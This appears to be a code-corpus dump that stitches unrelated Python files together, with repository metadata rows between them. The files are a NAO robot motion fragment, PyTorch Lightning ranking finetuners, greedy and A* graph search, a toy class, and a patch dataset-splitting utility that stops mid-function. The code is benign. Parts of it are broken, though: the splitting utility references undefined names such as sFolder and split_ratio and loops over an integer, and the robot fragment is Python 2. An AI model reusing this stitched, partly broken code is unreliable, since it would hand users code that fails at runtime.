keys.append([[1.19386, [3, -0.333333, 0], [3, 0.333333, 0]], [2.08197, [3, -0.333333, 0], [3, 0, 0]]])
names.append("RHand")
times.append([1, 2])
keys.append([[0.3, [3, -0.333333, 0], [3, 0.333333, 0]], [0.86, [3, -0.333333, 0], [3, 0, 0]]])
names.append("RHipPitch")
times.append([1, 2])
keys.append([[0.13, [3, -0.333333, 0], [3, 0.333333, 0]], [0.13, [3, -0.333333, 0], [3, 0, 0]]])
names.append("RHipRoll")
times.append([1, 2])
keys.append([[-0.1, [3, -0.333333, 0], [3, 0.333333, 0]], [-0.1, [3, -0.333333, 0], [3, 0, 0]]])
names.append("RHipYawPitch")
times.append([1, 2])
keys.append([[-0.17, [3, -0.333333, 0], [3, 0.333333, 0]], [-0.17, [3, -0.333333, 0], [3, 0, 0]]])
names.append("RKneePitch")
times.append([1, 2])
keys.append([[-0.09, [3, -0.333333, 0], [3, 0.333333, 0]], [-0.09, [3, -0.333333, 0], [3, 0, 0]]])
names.append("RShoulderPitch")
times.append([1, 2])
keys.append([[1.4712, [3, -0.333333, 0], [3, 0.333333, 0]], [0.403929, [3, -0.333333, 0], [3, 0, 0]]])
names.append("RShoulderRoll")
times.append([1, 2])
keys.append([[-0.184555, [3, -0.333333, 0], [3, 0.333333, 0]], [0.0879278, [3, -0.333333, 0], [3, 0, 0]]])
names.append("RWristYaw")
times.append([1, 2])
keys.append([[0.0999997, [3, -0.333333, 0], [3, 0.333333, 0]], [1.17641, [3, -0.333333, 0], [3, 0, 0]]])
def do2():
try:
motion = ALProxy("ALMotion", IP, 9559)
motion = ALProxy("ALMotion")
motion.angleInterpolationBezier(names, times, keys)
except BaseException, err:
print err
| 34.6 | 106 | 0.560934 | 762 | 4,152 | 3.05643 | 0.091864 | 0.089309 | 0.267926 | 0.301417 | 0.787892 | 0.787892 | 0.787892 | 0.782739 | 0.767282 | 0.66681 | 0 | 0.293227 | 0.125241 | 4,152 | 119 | 107 | 34.890756 | 0.348018 | 0 | 0 | 0.4 | 0 | 0 | 0.068658 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0 | 0.011111 | null | null | 0.011111 | 0 | 0 | 0 | null | 0 | 1 | 1 | 0 | 1 | 1 | 1 | 1 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 10 |
a16aca495cf86930d12c924513248215d3b2e1ef | 11,086 | py | Python | sushirank/finetuners.py | Datatouille/sushirank | fe77509c6220ae269b9cb3003045b973e34f8661 | [
"Apache-2.0"
] | 19 | 2020-07-19T07:14:57.000Z | 2022-01-29T02:42:40.000Z | sushirank/finetuners.py | Datatouille/sushirank | fe77509c6220ae269b9cb3003045b973e34f8661 | [
"Apache-2.0"
] | null | null | null | sushirank/finetuners.py | Datatouille/sushirank | fe77509c6220ae269b9cb3003045b973e34f8661 | [
"Apache-2.0"
] | 10 | 2020-07-19T07:18:49.000Z | 2020-12-16T13:39:34.000Z | import numpy as np
import torch
from torch.utils.data import DataLoader
import pytorch_lightning as pl
from transformers import (
AdamW,
get_linear_schedule_with_warmup,
)
#emb_sz_rule from fastai: https://github.com/fastai/fastai/blob/master/fastai/tabular/data.py
def emb_sz_rule(n_cat:int)->int: return min(600, round(1.6 * n_cat**0.56))
class PointwiseFinetuner(pl.LightningModule):
def __init__(self, hparams,train_dataset,valid_dataset,test_dataset):
super(PointwiseFinetuner, self).__init__()
self.hparams = hparams
self.train_dataset = train_dataset
self.valid_dataset = valid_dataset
self.test_dataset = test_dataset
#construct layers
self.n_cat = sum([emb_sz_rule(i) for i in self.hparams.cat_dims])
self.n_num = self.hparams.n_num
self.emb = torch.nn.ModuleList([torch.nn.Embedding(i, emb_sz_rule(i)) for i in self.hparams.cat_dims])
self.emb_droupout = torch.nn.Dropout(self.hparams.emb_drop)
self.head = torch.nn.Sequential(
torch.nn.Linear(self.n_cat + self.n_num, self.hparams.num_hidden),
torch.nn.Dropout(p=self.hparams.drop),
torch.nn.Linear(self.hparams.num_hidden, 1),
# torch.nn.Sigmoid()
)
#loss
self.loss_fn = torch.nn.MSELoss()
def forward(self,inp):
cat_x = inp['cat_feature']
cat_x = [e(cat_x[:,i]) for i,e in enumerate(self.emb)]
cat_x = torch.cat(cat_x, 1)
cat_x = self.emb_droupout(cat_x)
x = torch.cat([cat_x,inp['num_feature']],1)
x = self.head(x)
# x = (self.hparams.y_range[1]-self.hparams.y_range[0]) * x + self.hparams.y_range[0]
return x
def _step(self, batch):
preds = self.forward(batch)
loss = self.loss_fn(preds, batch['label'])
return loss, preds
def training_step(self, batch, batch_nb):
loss, _ = self._step(batch)
tensorboard_logs = {'train_loss': loss.cpu()}
return {'loss': loss.cpu(), 'log': tensorboard_logs}
def validation_step(self, batch, batch_nb):
loss, preds = self._step(batch)
tensorboard_logs = {'train_loss': loss.cpu()}
return {'loss': loss.cpu(), 'log': tensorboard_logs}
def validation_epoch_end(self, outputs):
avg_val_loss = np.stack([x['loss'] for x in outputs]).mean()
tensorboard_logs = {'val_loss': avg_val_loss,}
return {'val_loss': avg_val_loss,
'log': tensorboard_logs,
'progress_bar': tensorboard_logs}
def test_step(self, batch, batch_nb):
loss, preds = self._step(batch)
tensorboard_logs = {'train_loss': loss.cpu()}
return {'loss': loss.cpu(), 'log': tensorboard_logs}
def test_epoch_end(self, outputs):
avg_test_loss = np.stack([x['loss'] for x in outputs]).mean()
tensorboard_logs = {'test_loss': avg_test_loss,}
return {'test_loss': avg_test_loss,
'log': tensorboard_logs,
'progress_bar': tensorboard_logs}
def configure_optimizers(self):
no_decay = ["bias"]
optimizer_grouped_parameters = [
{
"params": [
p
for n, p in self.named_parameters()
if not any(nd in n for nd in no_decay)
],
"weight_decay": self.hparams.weight_decay,
},
{
"params": [
p
for n, p in self.named_parameters()
if any(nd in n for nd in no_decay)
],
"weight_decay": 0.0,
},
]
optimizer = AdamW(
optimizer_grouped_parameters,
lr=self.hparams.learning_rate,
eps=self.hparams.adam_epsilon,
)
self.opt = optimizer
return [optimizer]
def optimizer_step(
self, epoch, batch_idx, optimizer, optimizer_idx, second_order_closure=None,
on_tpu=False, using_native_amp=False, using_lbfgs=False
):
optimizer.step()
optimizer.zero_grad()
self.lr_scheduler.step()
def train_dataloader(self):
dataloader = DataLoader(
self.train_dataset,
batch_size=self.hparams.per_device_train_batch_size,
drop_last=True,
shuffle=True,
num_workers=0,
)
#calculate total timesteps
t_total = (
(
len(dataloader.dataset)
// (self.hparams.per_device_train_batch_size * max(1, self.hparams.n_gpu))
)
// self.hparams.gradient_accumulation_steps
* float(self.hparams.num_train_epochs)
)
#create scheduler
scheduler = get_linear_schedule_with_warmup(
self.opt,
num_warmup_steps=self.hparams.warmup_steps,
num_training_steps=t_total,
)
self.lr_scheduler = scheduler
return dataloader
def val_dataloader(self):
return DataLoader(
self.valid_dataset, batch_size=self.hparams.per_device_eval_batch_size, num_workers=0
)
def test_dataloader(self):
return DataLoader(
self.test_dataset, batch_size=self.hparams.per_device_eval_batch_size, num_workers=0
)
class PairwiseFinetuner(pl.LightningModule):
def __init__(self, hparams,train_dataset,valid_dataset,test_dataset):
super(PairwiseFinetuner, self).__init__()
self.hparams = hparams
self.train_dataset = train_dataset
self.valid_dataset = valid_dataset
self.test_dataset = test_dataset
#construct layers
self.n_cat = sum([emb_sz_rule(i) for i in self.hparams.cat_dims])
self.n_num = self.hparams.n_num
self.emb = torch.nn.ModuleList([torch.nn.Embedding(i, emb_sz_rule(i)) for i in self.hparams.cat_dims])
self.emb_droupout = torch.nn.Dropout(self.hparams.emb_drop)
self.head = torch.nn.Sequential(
torch.nn.Linear(self.n_cat + self.n_num, self.hparams.num_hidden),
torch.nn.Dropout(p=self.hparams.drop),
torch.nn.Linear(self.hparams.num_hidden, 1),
# torch.nn.Sigmoid()
)
#loss
# self.loss_fn = torch.nn.BCELoss()
self.loss_fn = torch.nn.BCEWithLogitsLoss()
def predict(self,inp):
cat_i = inp['cat_feature_i']
cat_i = [e(cat_i[:,idx]) for idx,e in enumerate(self.emb)]
cat_i = torch.cat(cat_i, 1)
cat_i = self.emb_droupout(cat_i)
x_i = torch.cat([cat_i,inp['num_feature_i']],1)
x_i = self.head(x_i)
return x_i
def forward(self,inp):
#i
cat_i = inp['cat_feature_i']
cat_i = [e(cat_i[:,idx]) for idx,e in enumerate(self.emb)]
cat_i = torch.cat(cat_i, 1)
cat_i = self.emb_droupout(cat_i)
x_i = torch.cat([cat_i,inp['num_feature_i']],1)
x_i = self.head(x_i)
#j
cat_j = inp['cat_feature_j']
cat_j = [e(cat_j[:,idx]) for idx,e in enumerate(self.emb)]
cat_j = torch.cat(cat_j, 1)
cat_j = self.emb_droupout(cat_j)
x_j = torch.cat([cat_j,inp['num_feature_j']],1)
x_j = self.head(x_j)
return x_i-x_j
def _step(self, batch):
preds = self.forward(batch)
loss = self.loss_fn(preds, batch['label'])
return loss, preds
def training_step(self, batch, batch_nb):
loss, _ = self._step(batch)
tensorboard_logs = {'train_loss': loss.cpu()}
return {'loss': loss.cpu(), 'log': tensorboard_logs}
def validation_step(self, batch, batch_nb):
loss, preds = self._step(batch)
tensorboard_logs = {'train_loss': loss.cpu()}
return {'loss': loss.cpu(), 'log': tensorboard_logs}
def validation_epoch_end(self, outputs):
avg_val_loss = np.stack([x['loss'] for x in outputs]).mean()
tensorboard_logs = {'val_loss': avg_val_loss,}
return {'val_loss': avg_val_loss,
'log': tensorboard_logs,
'progress_bar': tensorboard_logs}
def test_step(self, batch, batch_nb):
loss, preds = self._step(batch)
tensorboard_logs = {'train_loss': loss.cpu()}
return {'loss': loss.cpu(), 'log': tensorboard_logs}
def test_epoch_end(self, outputs):
avg_test_loss = np.stack([x['loss'] for x in outputs]).mean()
tensorboard_logs = {'test_loss': avg_test_loss,}
return {'test_loss': avg_test_loss,
'log': tensorboard_logs,
'progress_bar': tensorboard_logs}
def configure_optimizers(self):
no_decay = ["bias"]
optimizer_grouped_parameters = [
{
"params": [
p
for n, p in self.named_parameters()
if not any(nd in n for nd in no_decay)
],
"weight_decay": self.hparams.weight_decay,
},
{
"params": [
p
for n, p in self.named_parameters()
if any(nd in n for nd in no_decay)
],
"weight_decay": 0.0,
},
]
optimizer = AdamW(
optimizer_grouped_parameters,
lr=self.hparams.learning_rate,
eps=self.hparams.adam_epsilon,
)
self.opt = optimizer
return [optimizer]
def optimizer_step(
self, epoch, batch_idx, optimizer, optimizer_idx, second_order_closure=None,
on_tpu=False, using_native_amp=False, using_lbfgs=False
):
optimizer.step()
optimizer.zero_grad()
self.lr_scheduler.step()
def train_dataloader(self):
dataloader = DataLoader(
self.train_dataset,
batch_size=self.hparams.per_device_train_batch_size,
drop_last=True,
shuffle=True,
num_workers=0,
)
#calculate total timesteps
t_total = (
(
len(dataloader.dataset)
// (self.hparams.per_device_train_batch_size * max(1, self.hparams.n_gpu))
)
// self.hparams.gradient_accumulation_steps
* float(self.hparams.num_train_epochs)
)
#create scheduler
scheduler = get_linear_schedule_with_warmup(
self.opt,
num_warmup_steps=self.hparams.warmup_steps,
num_training_steps=t_total,
)
self.lr_scheduler = scheduler
return dataloader
def val_dataloader(self):
return DataLoader(
self.valid_dataset, batch_size=self.hparams.per_device_eval_batch_size, num_workers=0
)
def test_dataloader(self):
return DataLoader(
self.test_dataset, batch_size=self.hparams.per_device_eval_batch_size, num_workers=0
) | 35.532051 | 110 | 0.58416 | 1,384 | 11,086 | 4.401012 | 0.119942 | 0.077656 | 0.021671 | 0.026268 | 0.904285 | 0.879494 | 0.875882 | 0.875882 | 0.875882 | 0.870793 | 0 | 0.004301 | 0.307866 | 11,086 | 312 | 111 | 35.532051 | 0.789522 | 0.033556 | 0 | 0.756757 | 0 | 0 | 0.040748 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.108108 | false | 0 | 0.019305 | 0.019305 | 0.223938 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
a16ce9c23970e75e71335bd37f3a91e44c816c88 | 4,399 | py | Python | searchers/Informed.py | zachdj/graph-search | 74e63d9b1613efb478cbe6a9973692094c1e4c9d | [
"MIT"
] | null | null | null | searchers/Informed.py | zachdj/graph-search | 74e63d9b1613efb478cbe6a9973692094c1e4c9d | [
"MIT"
] | null | null | null | searchers/Informed.py | zachdj/graph-search | 74e63d9b1613efb478cbe6a9973692094c1e4c9d | [
"MIT"
] | null | null | null | from SearchNode import SearchNode
from Queue import PriorityQueue
"""
Performs a greedy search on the given problem using the provided heuristic function
heuristic should be a function h(p, n) that returns an estimate for the distance from node n to the
solution of problem p. It will be passed the problem and the current node.
"""
def greedy(problem, heuristic):
current_node = SearchNode(problem.start_node, None, 0)
frontier = PriorityQueue()
# elements of the priority queue are 2-element lists of the form (priority, data)
frontier.put([0, current_node])
explored = set()
while True:
if frontier.empty():
return None
queue_element = frontier.get()
current_node = queue_element[1]
# goal test
if problem.goal_test(current_node.node):
return current_node.to_path() # return solution as path
# add node ID to explored set
explored.add(current_node.node.id)
for edge in current_node.node.edges():
child = None
if edge.child().id != current_node.node.id:
child = edge.child()
elif not edge.directed() and edge.parent().id != current_node.node.id:
child = edge.parent()
if child is not None:
weight = float(edge['weight'])
child_node = SearchNode(child, current_node, weight)
fn = heuristic(problem, child) # value given by the evaluation function for this node
# check that child is not in explored or frontier
child_in_explored = child.id in explored
child_in_frontier = False
for item in frontier.queue:
if item[1].node.id == child.id:
child_in_frontier = True
# if the child has a lower heuristic score, replace the frontier node with child
if fn < item[0]:
item[0] = fn
item[1] = child_node
if not child_in_explored and not child_in_frontier:
frontier.put([fn, child_node])
"""
Performs A* search on the given problem using the given heuristic function
heuristic should be a function h(p, n) that returns an estimate for the distance from node n to the
solution of problem p. It will be passed the problem and the current node.
"""
def a_star(problem, heuristic):
current_node = SearchNode(problem.start_node, None, 0)
frontier = PriorityQueue()
# elements of the priority queue are 2-element lists of the form (priority, data)
frontier.put([0, current_node])
explored = set()
while True:
if frontier.empty():
return None
queue_element = frontier.get()
current_node = queue_element[1]
current_node_path_cost = current_node.get_path_cost()
# goal test
if problem.goal_test(current_node.node):
return current_node.to_path() # return solution as path
# add node ID to explored set
explored.add(current_node.node.id)
for edge in current_node.node.edges():
child = None
if edge.child().id != current_node.node.id:
child = edge.child()
elif not edge.directed() and edge.parent().id != current_node.node.id:
child = edge.parent()
if child is not None:
weight = float(edge['weight'])
child_node = SearchNode(child, current_node, weight)
child_path_cost = current_node_path_cost + weight
fn = child_path_cost + heuristic(problem, child)
# check that child is not in explored or frontier
child_in_explored = child.id in explored
child_in_frontier = False
for item in frontier.queue:
if item[1].node.id == child.id:
child_in_frontier = True
# if the child has a lower evaluation, replace the frontier node with child
if fn < item[0]:
item[0] = fn
item[1] = child_node
if not child_in_explored and not child_in_frontier:
frontier.put([fn, child_node])
| 40.731481 | 104 | 0.586497 | 554 | 4,399 | 4.530686 | 0.16787 | 0.109562 | 0.059761 | 0.040637 | 0.875697 | 0.875697 | 0.875697 | 0.850996 | 0.850996 | 0.850996 | 0 | 0.005531 | 0.342351 | 4,399 | 107 | 105 | 41.11215 | 0.862081 | 0.132985 | 0 | 0.885714 | 0 | 0 | 0.003703 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.028571 | false | 0 | 0.028571 | 0 | 0.114286 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
a1a4eef66984b24431489bb08121c8ea195d91e7 | 42 | py | Python | src/gamemaker/__init__.py | SarthTheSnek/FlywrenchRandomizer | 18c374ed20e3d2e769354ed1a5d0a1c146aa7701 | [
"MIT"
] | null | null | null | src/gamemaker/__init__.py | SarthTheSnek/FlywrenchRandomizer | 18c374ed20e3d2e769354ed1a5d0a1c146aa7701 | [
"MIT"
] | 1 | 2020-12-03T07:49:38.000Z | 2020-12-03T07:51:08.000Z | src/gamemaker/__init__.py | SarthTheSnek/FlywrenchRandomizer | 18c374ed20e3d2e769354ed1a5d0a1c146aa7701 | [
"MIT"
] | null | null | null | from . import convert
from . import write | 21 | 22 | 0.761905 | 6 | 42 | 5.333333 | 0.666667 | 0.625 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.190476 | 42 | 2 | 23 | 21 | 0.941176 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 1 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 7 |
a1f6ec196cf78e8bb8b303749ff6aadae3b364bd | 242 | py | Python | farm/sounds.py | tulay/jnote | f4217be0dec8a461c186d5a5752c99ec0cc30a57 | [
"Apache-2.0"
] | null | null | null | farm/sounds.py | tulay/jnote | f4217be0dec8a461c186d5a5752c99ec0cc30a57 | [
"Apache-2.0"
] | null | null | null | farm/sounds.py | tulay/jnote | f4217be0dec8a461c186d5a5752c99ec0cc30a57 | [
"Apache-2.0"
] | null | null | null |
class Animal:
def __init__(self, sound):
self.sound = sound
def sayit(self, count=4):
return (self.sound.capitalize() + "! ") * count
class Duck(Animal):
def __init__(self):
super().__init__("quack")
| 16.133333 | 55 | 0.582645 | 28 | 242 | 4.607143 | 0.5 | 0.209302 | 0.20155 | 0.263566 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.00565 | 0.268595 | 242 | 14 | 56 | 17.285714 | 0.723164 | 0 | 0 | 0 | 0 | 0 | 0.029289 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.375 | false | 0 | 0 | 0.125 | 0.75 | 0 | 1 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 7 |
b8062e9f7c5698a152f95c7ec6362d49942acaf6 | 32,838 | py | Python | GUI/PyQt/utilsGUI/Training_Test_Split.py | so2liu/CNNArt | 9d91bf08a044e7d5068f8446663726411d2236dd | [
"Apache-2.0"
] | null | null | null | GUI/PyQt/utilsGUI/Training_Test_Split.py | so2liu/CNNArt | 9d91bf08a044e7d5068f8446663726411d2236dd | [
"Apache-2.0"
] | null | null | null | GUI/PyQt/utilsGUI/Training_Test_Split.py | so2liu/CNNArt | 9d91bf08a044e7d5068f8446663726411d2236dd | [
"Apache-2.0"
] | null | null | null | # -*- coding: utf-8 -*-
"""
Created on Thu Mar 02 15:59:36 2017
@author: Sebastian Milde, Thomas Kuestner
"""
import math
import numpy as np
import h5py
import inspect
import dis
from sklearn.model_selection import KFold
import os
from GUI.PyQt.DLArt_GUI import dlart
import keras.backend as K
def expecting():
"""Return how many values the caller is expecting"""
f = inspect.currentframe()
f = f.f_back.f_back
c = f.f_code
i = f.f_lasti
bytecode = c.co_code
instruction = bytecode[i+3]
if instruction == dis.opmap['UNPACK_SEQUENCE']:
howmany = bytecode[i+4]
return howmany
elif instruction == dis.opmap['POP_TOP']:
return 0
return 1
def fSplitDataset(allPatches, allY, allPats, sSplitting, patchSize, patchOverlap, testTrainingDatasetRatio=0, validationTrainRatio=0, outPutPath=None, nfolds = 0, isRandomShuffle=True):
# TODO: adapt path
iReturn = expecting()
#iReturn = 1000
# 2D or 3D patching?
if len(patchSize) == 2:
#2D patches are used
if allPatches.shape[0] == patchSize[0] and allPatches.shape[1] == patchSize[1]:
allPatches = np.transpose(allPatches, (2, 0, 1))
elif len(patchSize) == 3:
#3D patches are used
if allPatches.shape[0] == patchSize[0] and allPatches.shape[1] == patchSize[1] and allPatches.shape[2] == patchSize[2]:
allPatches = np.transpose(allPatches, (3, 0, 1, 2))
if sSplitting == dlart.DeepLearningArtApp.SIMPLE_RANDOM_SAMPLE_SPLITTING:
# splitting
indexSlices = range(allPatches.shape[0])
if isRandomShuffle:
indexSlices = np.random.permutation(indexSlices)
if len(patchSize)==2:
#2D patching
allPatches = allPatches[indexSlices, :, :]
elif len(patchSize)==3:
#3D patching
allPatches = allPatches[indexSlices, :, :, :]
shapeAllY = allY.shape
if len(shapeAllY) > 1:
if allY.shape[0] == patchSize[0] and allY.shape[1] == patchSize[1]:
allY = np.transpose(allY, (2, 0, 1))
allY = allY[indexSlices]
#num of samples in test set and validation set
numAllPatches = allPatches.shape[0]
numSamplesTest = math.floor(testTrainingDatasetRatio*numAllPatches)
numSamplesValidation = math.floor(validationTrainRatio*(numAllPatches-numSamplesTest))
if len(patchSize) == 2:
#2D patching
# subarrays as no-copy views (array slices)
X_test = allPatches[:numSamplesTest, :, :]
X_valid = allPatches[numSamplesTest:(numSamplesTest+numSamplesValidation), :, :]
X_train = allPatches[(numSamplesTest+numSamplesValidation):, :, :]
elif len(patchSize) == 3:
# 3D patching
# subarrays as no-copy views (array slices)
X_test = allPatches[:numSamplesTest, :, :, :]
X_valid = allPatches[numSamplesTest:(numSamplesTest + numSamplesValidation), :, :, :]
X_train = allPatches[(numSamplesTest + numSamplesValidation):, :, :, :]
y_test = allY[:numSamplesTest]
y_valid = allY[numSamplesTest:(numSamplesTest + numSamplesValidation)]
y_train = allY[(numSamplesTest + numSamplesValidation):]
# #random samples
# nPatches = allPatches.shape[0]
# dVal = math.floor(split_ratio * nPatches)
# rand_num = np.random.permutation(np.arange(nPatches))
# rand_num = rand_num[0:int(dVal)].astype(int)
# print(rand_num)
#
# #do splitting
# X_test = allPatches[rand_num, :, :]
# y_test = allY[rand_num]
# X_train = allPatches
# X_train = np.delete(X_train, rand_num, axis=0)
# y_train = allY
# y_train = np.delete(y_train, rand_num)
# print(X_train.shape)
# print(X_test.shape)
# print(y_train.shape)
# print(y_test.shape)
# #!!!! train dataset is not randomly shuffeled!!!
if iReturn == 0:
if len(patchSize) == 3:
folder = sFolder + os.sep + str(patchSize[0]) + str(patchSize[1]) + str(patchSize[2])
Path = sFolder + os.sep + str(patchSize[0]) + str(patchSize[1]) + str(
patchSize[2]) + os.sep + 'normal_' + str(patchSize[0]) + str(patchSize[1]) + '.h5'
else:
folder = sFolder + os.sep + str(patchSize[0]) + str(patchSize[1])
Path = sFolder + os.sep + str(patchSize[0]) + str(patchSize[1]) + os.sep + 'normal_' + str(
patchSize[0]) + str(patchSize[1]) + '.h5'
if os.path.isdir(folder):
pass
else:
os.makedirs(folder)
print(Path)
with h5py.File(Path, 'w') as hf:
hf.create_dataset('X_train', data=X_train)
hf.create_dataset('X_test', data=X_test)
hf.create_dataset('y_train', data=y_train)
hf.create_dataset('y_test', data=y_test)
hf.create_dataset('patchSize', data=patchSize)
hf.create_dataset('patchOverlap', data=patchOverlap)
else:
# if len(patchSize) == 2:
# # 2D patches are used
# if allPatches.shape[1] == patchSize[0] and allPatches.shape[2] == patchSize[1]:
# X_train = np.transpose(X_train, (1, 2, 0))
# X_valid = np.transpose(X_valid, (1, 2, 0))
# X_test = np.transpose(X_test, (1, 2, 0))
# elif len(patchSize) == 3:
# # 3D patches are used
# if allPatches.shape[0] == patchSize[0] and allPatches.shape[1] == patchSize[1] and allPatches.shape[2] == patchSize[2]:
# X_train = np.transpose(X_train, (1, 2, 3, 0))
# X_valid = np.transpose(X_valid, (1, 2, 3, 0))
# X_test = np.transpose(X_test, (1, 2, 3, 0))
return [X_train], [y_train], [X_valid], [y_valid], [X_test], [y_test] # embed in a 1-fold list
elif sSplitting == dlart.DeepLearningArtApp.CROSS_VALIDATION_SPLITTING:
# split into test/train sets
#shuffle
indexSlices = range(allPatches.shape[0])
indexSlices = np.random.permutation(indexSlices)
allPatches = allPatches[indexSlices, :, :]
allY = allY[indexSlices]
# num of samples in test set
numAllPatches = allPatches.shape[0]
numSamplesTest = math.floor(testTrainingDatasetRatio*numAllPatches)
# subarrays as no-copy views (array slices)
xTest = allPatches[:numSamplesTest, :, :]
yTest = allY[:numSamplesTest]
xTrain = allPatches[numSamplesTest:, :, :]
yTrain = allY[numSamplesTest:]
# split training dataset into n folds
if nfolds == 0:
kf = KFold(n_splits=len(allPats))
else:
kf = KFold(n_splits=nfolds)
#ind_split = 0
X_trainFold = []
X_testFold = []
y_trainFold = []
y_testFold = []
for train_index, test_index in kf.split(xTrain):
X_train, X_test = xTrain[train_index], xTrain[test_index]
y_train, y_test = yTrain[train_index], yTrain[test_index]
if iReturn == 0:
if len(patchSize) == 3:
folder = sFolder + os.sep + str(patchSize[0]) + str(patchSize[1]) + str(patchSize[2])
Path = sFolder + os.sep + str(patchSize[0]) + str(patchSize[1]) + str(
patchSize[2]) + os.sep + 'crossVal_data' + str(ind_split) + '_' + str(patchSize[0]) + str(
patchSize[1]) + str(patchSize[2]) + '.h5'
else:
folder = sFolder + os.sep + str(patchSize[0]) + str(patchSize[1])
Path = sFolder + os.sep + str(patchSize[0]) + str(patchSize[1]) + os.sep + 'crossVal_data' + str(
ind_split) + '_' + str(patchSize[0]) + str(patchSize[1]) + '.h5'
if os.path.isdir(folder):
pass
else:
os.makedirs(folder)
with h5py.File(Path, 'w') as hf:
hf.create_dataset('X_train', data=X_train)
hf.create_dataset('X_test', data=X_test)
hf.create_dataset('y_train', data=y_train)
hf.create_dataset('y_test', data=y_test)
hf.create_dataset('patchSize', data=patchSize)
hf.create_dataset('patchOverlap', data=patchOverlap)
else:
X_trainFold.append(X_train)
X_testFold.append(X_test)
y_trainFold.append(y_train)
y_testFold.append(y_test)
#ind_split += 1
X_trainFold = np.asarray(X_trainFold)
X_testFold = np.asarray(X_testFold)
y_trainFold = np.asarray(y_trainFold)
y_testFold = np.asarray(y_testFold)
if iReturn > 0:
return X_trainFold, y_trainFold, X_testFold, y_testFold, xTest, yTest
elif sSplitting == dlart.DeepLearningArtApp.PATIENT_CROSS_VALIDATION_SPLITTING:
unique_pats = len(allPats)
X_trainFold = []
X_testFold = []
y_trainFold = []
y_testFold = []
for ind_split in unique_pats:
train_index = np.where(allPats != ind_split)[0]
test_index = np.where(allPats == ind_split)[0]
X_train, X_test = allPatches[train_index], allPatches[test_index]
y_train, y_test = allY[train_index], allY[test_index]
if iReturn == 0:
if len(patchSize) == 3:
folder = sFolder + os.sep + str(patchSize[0]) + str(patchSize[1]) + str(patchSize[2])
Path = sFolder + os.sep + str(patchSize[0]) + str(patchSize[1]) + str(
patchSize[2]) + os.sep + 'crossVal' + str(ind_split) + '_' + str(patchSize[0]) + str(
patchSize[1]) + str(patchSize[2]) + '.h5'
else:
folder = sFolder + os.sep + str(patchSize[0]) + str(patchSize[1])
Path = sFolder + os.sep + str(patchSize[0]) + str(patchSize[1]) + os.sep + 'crossVal' + str(
ind_split) + '_' + str(patchSize[0]) + str(patchSize[1]) + '.h5'
if os.path.isdir(folder):
pass
else:
os.makedirs(folder)
with h5py.File(Path, 'w') as hf:
hf.create_dataset('X_train', data=X_train)
hf.create_dataset('X_test', data=X_test)
hf.create_dataset('y_train', data=y_train)
hf.create_dataset('y_test', data=y_test)
hf.create_dataset('patchSize', data=patchSize)
hf.create_dataset('patchOverlap', data=patchOverlap)
else:
X_trainFold.append(X_train)
X_testFold.append(X_test)
y_trainFold.append(y_train)
y_testFold.append(y_test)
X_trainFold = np.asarray(X_trainFold, dtype='f')
X_testFold = np.asarray(X_testFold, dtype='f')
y_trainFold = np.asarray(y_trainFold, dtype='f')
y_testFold = np.asarray(y_testFold, dtype='f')
if iReturn > 0:
return X_trainFold, y_trainFold, X_testFold, y_testFold
elif sSplitting == "normal":
print("Done")
nPatches = allPatches.shape[0]
dVal = math.floor(split_ratio * nPatches)
rand_num = np.random.permutation(np.arange(nPatches))
rand_num = rand_num[0:int(dVal)].astype(int)
print(rand_num)
if len(patchSize) == 3:
X_test = allPatches[rand_num, :, :, :]
else:
X_test = allPatches[rand_num, :, :]
y_test = allY[rand_num]
X_train = allPatches
X_train = np.delete(X_train, rand_num, axis=0)
y_train = allY
y_train = np.delete(y_train, rand_num)
#print(X_train.shape)
#print(X_test.shape)
#print(y_train.shape)
#print(y_test.shape)
if iReturn == 0:
if len(patchSize) == 3:
folder = sFolder + os.sep + str(patchSize[0]) + str(patchSize[1]) + str(patchSize[2])
Path = sFolder + os.sep + str(patchSize[0]) + str(patchSize[1]) + str(patchSize[2]) + os.sep + 'normal_' + str(patchSize[0]) + str(patchSize[1]) + '.h5'
else:
folder = sFolder + os.sep + str(patchSize[0]) + str(patchSize[1])
Path = sFolder + os.sep + str(patchSize[0]) + str(patchSize[1]) + os.sep + 'normal_' + str(patchSize[0]) + str(patchSize[1]) + '.h5'
if os.path.isdir(folder):
pass
else:
os.makedirs(folder)
print(Path)
with h5py.File(Path, 'w') as hf:
hf.create_dataset('X_train', data=X_train)
hf.create_dataset('X_test', data=X_test)
hf.create_dataset('y_train', data=y_train)
hf.create_dataset('y_test', data=y_test)
hf.create_dataset('patchSize', data=patchSize)
